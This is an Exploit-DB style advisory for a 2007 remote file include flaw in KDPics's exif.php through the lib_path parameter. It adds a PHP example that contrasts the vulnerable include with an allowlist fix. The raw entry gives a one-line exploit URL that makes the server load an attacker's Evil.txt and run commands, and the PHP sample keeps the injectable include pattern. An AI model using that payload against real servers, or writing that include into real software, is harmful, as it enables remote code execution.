Vendor: KDPics
By: AsTrex
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: KDPics
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

KDPics <= Remote File Include Vulnerability

The vulnerability allows an attacker to make the vulnerable PHP script include a remote file. The affected file is exif.php in the KDPics/lib/exifer/ directory: the 'lib_path' URL parameter is used without validation to build an include path, so an attacker can point it at a file they control (Evil.txt in the advisory) and execute arbitrary commands on the server.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in any file include, and keep the software up to date with the latest patches and security fixes.
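The include pattern the advisory describes next to a hardened replacement, as an added example that is not KDPics' own code: the vulnerable function is a hypothetical reconstruction (only the exif.php file name and the lib_path parameter come from the advisory), and the library layout, the `lib` key, the allowlist and the helper names are assumptions.

```php
<?php
// Added example, not KDPics' own code. The vulnerable function is a hypothetical
// reconstruction of the pattern the advisory describes; exif.php and lib_path come
// from the advisory, everything else (paths, key names, helpers) is assumed.

// --- Vulnerable pattern: include target built from request data ---
function vulnerable_include(): void
{
    // With register_globals (common on 2007-era hosts) the assignment is implicit;
    // either way $lib_path is attacker-controlled. If allow_url_include (or, before
    // PHP 5.2, allow_url_fopen) is on, a value such as "http://example.invalid/x.txt?"
    // makes include() fetch and execute remote code.
    $lib_path = $_GET['lib_path'] ?? './';
    include $lib_path . 'exif.php';
}

// --- Hardened form: allowlist plus path containment ---
define('LIB_ROOT', __DIR__ . '/lib/exifer');          // assumed layout
$ALLOWED_LIBS = ['exifer' => LIB_ROOT . '/exif.php']; // key -> fixed server-side path

function safe_lib_path(string $key, array $allowed, string $root): string
{
    // 1. The request may only choose a key; the path itself never comes from input.
    if (!array_key_exists($key, $allowed)) {
        throw new InvalidArgumentException('unknown library key');
    }
    // 2. Defence in depth: realpath() resolves ../ and symlinks and returns false
    //    for missing files and URL wrappers, so the result must still sit under root.
    $real = realpath($allowed[$key]);
    $rootReal = realpath($root);
    if ($real === false || $rootReal === false
        || strpos($real, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include target outside library root');
    }
    return $real;
}

function hardened_include(array $allowed): void
{
    $key = (string) ($_GET['lib'] ?? 'exifer');
    require safe_lib_path($key, $allowed, LIB_ROOT);
}

// Server-side setting that removes the remote part regardless of application code:
//   php.ini: allow_url_include = Off   (PHP >= 5.2; allow_url_fopen = Off before that)
```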
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
KDPics <= Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by AsTrex "Rif Hackers Team"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL:
http://www.phpscripts-fr.net/scripts/download.php?id=2212
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
V.CODE: In: KDPics/lib/exifer/exif.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetz to: moroccan islam defenders, ba azdin, xskull, savi7

# milw0rm.com [2007-02-03]